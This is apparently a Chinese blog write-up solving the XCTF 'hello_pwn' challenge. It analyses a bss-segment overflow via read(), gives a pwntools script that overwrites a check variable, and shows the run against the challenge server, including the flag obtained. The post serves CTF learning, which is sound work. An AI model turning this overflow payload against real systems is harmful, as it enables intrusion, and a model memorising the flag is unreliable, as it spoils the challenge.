hello_pwn [XCTF-PWN]CTF writeup系列4

最新推荐文章于 2022-11-21 19:53:33 发布
最新推荐文章于 2022-11-21 19:53:33 发布
阅读量629 收藏 1
点赞数
分类专栏: XCTF-PWN CTF 文章标签: xctf ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fastergohome/article/details/103621958
版权
CTF 同时被 2 个专栏收录
46 篇文章 4 订阅
订阅专栏
XCTF-PWN
28 篇文章 10 订阅
订阅专栏

题目:hello_pwn

先看下题目

照例,检查一下保护情况,反编译程序

root@mypwn:/ctf/work/python# checksec c0a6dfb32cc7488a939d8c537530174d 
[*] '/ctf/work/python/c0a6dfb32cc7488a939d8c537530174d'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

 注意到汇编程序中最重要的两个函数,如下图:

把两个重要的函数,反编译成c语言代码:

__int64 sub_400686()
{
  system("cat flag.txt");
  return 0LL;
}

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  alarm(0x3Cu);
  setbuf(stdout, 0LL);
  puts("~~ welcome to ctf ~~     ");
  puts("lets get helloworld for bof");
  read(0, &unk_601068, 0x10uLL);
  if ( dword_60106C == 1853186401 )
    sub_400686(0LL, &unk_601068);
  return 0LL;
}

注意到两个重要的变量unk_601068和dword_60106C,正常来说linux程序中以60开头的变量命名都是bss段中的变量,我们可以直接用其地址,_前面的unk和dword代表的是数据类型,后面代表的是地址。

这个题目用read函数的bss段溢出,从unk_601068溢出覆盖dword_60106C,我们可以算出偏移值为60106C-601068=4

接下来我们就可以构造payload

payload = 'A'*4 + p64(1853186401)

前面的4个A会赋值到unk_601068,64位整数1853186401会赋值到dword_60106C,这样就可以达到条件

if ( dword_60106C == 1853186401 )

接着我们就可以构造本地执行的python脚本:

#!python
#!/usr/bin/env python
# coding=utf-8

from pwn import *

p = process('./c0a6dfb32cc7488a939d8c537530174d')
# p = remote("111.198.29.45", 57096)

payload = 'A'*4 + p64(1853186401)

p.sendlineafter('lets get helloworld for bof', payload)
p.interactive()

执行结果如下:

root@mypwn:/ctf/work/python# python hello_pwn.py 
[+] Starting local process './c0a6dfb32cc7488a939d8c537530174d': pid 118
[*] Switching to interactive mode

cat: flag.txt: No such file or directory
[*] Process './c0a6dfb32cc7488a939d8c537530174d' stopped with exit code 0 (pid 118)
[*] Got EOF while reading in interactive
$

没有问题,执行成功,接下来调整python脚本之后,在服务器上执行:

root@mypwn:/ctf/work/python# python hello_pwn.py 
[+] Opening connection to 111.198.29.45 on port 57096: Done
[*] Switching to interactive mode

cyberpeace{c18106c5a9772565799b4626bf170be9}
[*] Got EOF while reading in interactive
$

成功了,这个题目考的主要知识点是read函数造成的bss段溢出。

bss段溢出和栈溢出本质上来说都是一样的,只是溢出发生的位置不同而已。

3riC5r
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF|栈溢出入门题hellopwn解题思路
skyattractive的博客
05-31 1635
CTF|栈溢出入门题hellopwn解题思路及个人总结 解题思路 将题目下载下来后拖入虚拟机ubuntu中,利用checksec hellopwn 查到有关文件保护信息 NX enabled 表示这个文件NX保护已经打开(个人总结会写各种保护) 输入./hellopwn命令行将文件运行 走一边流程,发现程序很简单 拖入IDA 按照往常一样去找栈溢出的地方,这里我们找到了read这个函数,读入10个字节 (伪代码中一些函数和变量的名字我自行修改了,方便观看) 题意很明显,我们只需让v2等于1853186
[CTF-PWN]攻防世界新手村-hello_pwn[wp]
murongxuege的博客
10-01 2551
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 从描述中可以看出当前程序是要进行年龄的输入操作的,有输入操作,还是在新手村,那么大概率是gets()等C函数输入漏洞,进一步猜测是普通的内存地址覆盖的题。 che
攻防世界hello _pwn总结
RMC131的博客
11-13 4554
checksec 转自:checksec工具使用-pwn – 简书 (jianshu.com) 基本用法:checksec –file=hello_pwn Arch: 系统架构信息,判断是64位还是32位,选择相应的IDA和写相应的exp。 amd64-64-little说明为64位,选用64位的IDA,写64位的exp。 RELRO: Relocation Read-Only (RELRO),此项技术针对GOT/GIFTO(区块链)改写的攻击方式。分为两种,Partial RELRO 和 Full RE
XCTF hello_pwn
prettyX的博客
06-09 271
先使用file查看 checksec
攻防世界hello pwn WP(pwn入门基础题)
m0_62584974的博客
11-21 2036
攻防世界hello pwn WP(pwn入门基础题)的简单讲解
攻防世界pwn第二题-hello pwn(两种方法)
Greic的博客
11-28 1934
嘿嘿,我又回来了。看到上次自己发的博客,感觉图片的排版好差劲 这次我将!搞好一点(hhh),话不多说,开始。 至于前面的检查保护类型和看文件类型就不说了,有兴趣的小伙伴们可以看看pwn的第一题。有一说一,其实这道题已经有很大大佬发过write-up了,大佬们也写的很好,我在做题的过程中,也看过一些大佬们的write-up,但嘛,写一写,总是比没有好叭。 在检查完文件类型和保护机制后,我们很容易发现,就是一个很普通的64位的Linux件,且并没有什么保护类型。这个时候,我们先运行看看...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
CTF PWN专用虚拟机-附件资源
03-05
CTF PWN专用虚拟机-附件资源
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
PWM-OUT.rar_PWN_out
09-19
"PWM-OUT.rar_PWN_out"这个压缩包文件,显然是关于如何在某种微控制器上设置和使用PWM输出的教程或代码示例。 在微控制器中,PWM的生成主要涉及到以下几个关键知识点: 1. **PWM通道**:微控制器通常有多个PWM通道...
XCTF hello_pwn题目
weixin_45643931的博客
11-14 2406
第一个题目通过EXP脚本连接上就出现了flag,懒得写WP 这个题目是XCTF的第二个题,也是我接触的第一个正式的pwn题目 直接下载附件 之后用IDA打开 打开以后,也不是很确定干啥,就直接ALT+T (搜索) 搜索CTF,flag之类的 之后就搜到了CTF的一句话 双击进去 然后按下F5 查看伪代码 而这里的if语句告诉了我们很多信息,如果XXX,就OOO双击函数进去 分析一下,应该是当…6C = 1853186401 时进入…0686()函数获得flag。 而这两个数据相差4个字节,更方便通过
2021 ciscn 线上 pwn lonelywolf
yongbaoii的博客
08-30 217
显然是全开。 add 只能控制一个chunk,size也有限制。 edit 以回车结束。 这里有一个off by null。 show 就输出。 free 有个uaf。 整个看下来,那个index就是那种逗你玩那种。 然后libc当时给的是2.27,但是做半天发现是最新的2.27……里面更新了对那些tcache链表的那些检查,就挺离谱的,所以可以当成2.29来做。 那想想怎么来利用那个uaf。 uaf,在得到libc的条件下,我们可以直接攻击free_hook,来getshell。 但问题就是怎么来得到.
day-6 xctf-hello_pwn
a525024162806525的博客
09-26 381
xctf-hello_pwn 题目传送门:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5052 又是一个溢出,和昨天的有异曲同工之处: 差4个字节,溢出改变dword_60106C的值为nuaa(注意:这里为小端存储,要写为'aa...
js中的new file_buuoj刷题——ciscn_final_2看_IO_FILE
weixin_39845221的博客
11-29 145
题目概览标准菜单堆,64位题,没有去掉符号表,保护全开。首先nop掉alarm没有edit函数Sandbox_Loading这个函数中调用了prctl函数,然后定义了一大堆变量函数原型int prctl(int option, unsigned long arg2, unsigned long arg3,unsigned long arg4, unsigned long arg5);通过阅读手册,...
攻防世界 hello_pwn
西部壮仔的博客
06-27 1270
从题上可以看出当dword_60106C的值为1853186401的时候就会执行sub_400686()函数 执行这个函数会得到我们想要的flag 先看一下这个程序的保护机制 、 exp的内容就是 from pwn import * p = process("./hello_pwn") p.recvuntil('lets get helloworld for bof\n') payl...
攻防世界pwn新手练习(hello_pwn
BurYiA的博客
10-24 3673
hello_pwn 拿到程序后,我们首先checksec一下 可以看到是64位程序,好的是这次只开了NX(堆栈不可执行),ok,我们跑一下程序看看 可以看到它是一个输入,然后就啥都没有了emmmm…好吧,咱们继续放到IDA里面看看 ...
hello_pwn(xctf)
weixin_43868725的博客
05-06 616
0x0 程序保护和流程 保护: 流程: subsub_400686(): 当dword_60106C = 1853186401 时进入subsub_400686()函数获得flag。 0x1 利用 仔细分析后可以发现 两个数据是相邻的,我们可以通过read函数改写dword_60106C的值从而获得flag。unk_601068和dword_60106C 只相差四个字节,read函数可以输...
攻防世界PWN-hello_pwn
Deeeelete的博客
11-14 393
题目:hello_pwn 进pe查看程序 因为该题目比较简单,所以确认是64位程序,直接进IDA f5反编译main函数 单独摘出代码 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { alarm(0x3Cu); setbuf(stdout, 0LL); puts("~~ welcome to ctf ~~ "); puts("lets get helloworld for bof"); re
xdctf2015_pwn200
最新发布
09-03
xdctf2015_pwn200是一道CTF比赛中的题目,是一个二进制漏洞利用题目。从代码中可以看出,它利用了一个栈溢出漏洞来实现攻击。在攻击过程中,首先使用write函数的got地址来泄露出libc中write函数的真实地址,然后通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值